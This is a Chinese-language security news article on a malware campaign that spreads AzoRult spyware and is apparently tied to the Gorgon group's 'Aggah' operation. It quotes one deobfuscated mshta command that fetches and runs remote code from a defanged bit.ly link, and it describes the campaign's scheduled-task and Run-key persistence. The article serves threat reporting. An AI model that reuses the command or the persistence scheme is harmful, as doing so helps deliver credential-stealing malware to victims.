在今年3月份,网络安全公司Palo Alto Networks旗下情报威胁分析研究小组Unit 42公开披露了一起针对中东国家的网络攻击行动,并认为它与巴基斯坦黑客组织“蛇发女妖(Gorgon)”有关。
这起行动被命名为“Aggah”,源于攻击者用来托管Revenge远控木马的Pastebin网站账户名(“HAGGA”)以及攻击者用来分割发送到Revenge C2服务器的数据的字符串(“aggah”)。
近日,另一家网络安全公司Yoroi声称发现了一起与“Aggah”行动似乎存在关联的网络攻击行动,它们有着非常相似的感染链。
最大的区别在于,“Aggah”行动传播的恶意软件是Revenge远控木马,而新发现的行动传播的是AzoRult间谍软件。
恶意文档分析
与“Aggah”行动一样,新行动的感染链也从一份包含VBA宏代码的恶意Office文档开始。
在去混淆后,你会发现它调用了如下系统命令:
mshta.exehttp://bit[.ly/8hsshjahassahsh
短连接“bit.ly”会将受害者重定向到“hxxps://myownteammana.blogspot[.com/p/otuego4thday.html”,一个Blogspot博客页面,这同样与“Aggah”行动一样。
在该页面的源代码中,包含有一段将由MSHTA引擎执行JavaScript代码。
分析表明,该脚本是一个下载程序,用于下载托管在PasteBin上的第二阶段有效载荷。与“Aggah”行动一样,PasteBin账户名同样是“hagga”。
下载的第二阶段有效载荷将会终止Office套件进程,并创建一个新的注册表项,以实现在目标系统上的持久性。
具体来说,第二阶段有效载荷使用了三种机制来实现在目标系统上的持久性:创建一个名为“Windows Update”的新任务,每60分钟触发一次; 创建另一个名为“Update”的任务每300分钟触发一次;设置注册表项“HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate”。
代码中的三个链接都指向同一个脚本,而该脚本将从Pastebin下载另外两段用于组成一个Powershell脚本的代码。
AzoRult有效载荷
如上所述,新行动的最终有效载荷是在暗网交易市场上非常畅销的AzoRult间谍软件,它能够窃取大多数主流浏览器(如Chromium、Firefox、Opera、Vivaldi等)保存的凭证、cookie,以及其他敏感数据。
分析表明,在这起新行动中传播的AzoRult是一个定制版本(3.2版本),被命名为“Mana Tools”,与攻击者使用的Blogspot博客页面相对应。
结论
在这个月的前几天,Yoroi发现攻击者在这起新行动中传播的有效载荷都是AzoRult间谍软件,但之后却切换为了Revenge远控木马。
如此看来,Gorgon黑客组织的确极有可能就是这起新行动的幕后操纵者。之所以使用AzoRult,有可能是该黑客组织准备丰富他们的“军火库”。
不过,这里也存在另一种可能,即一个新的黑客组织模仿了“Aggah”行动的感染链,试图让Gorgon黑客组织来背这口黑锅。
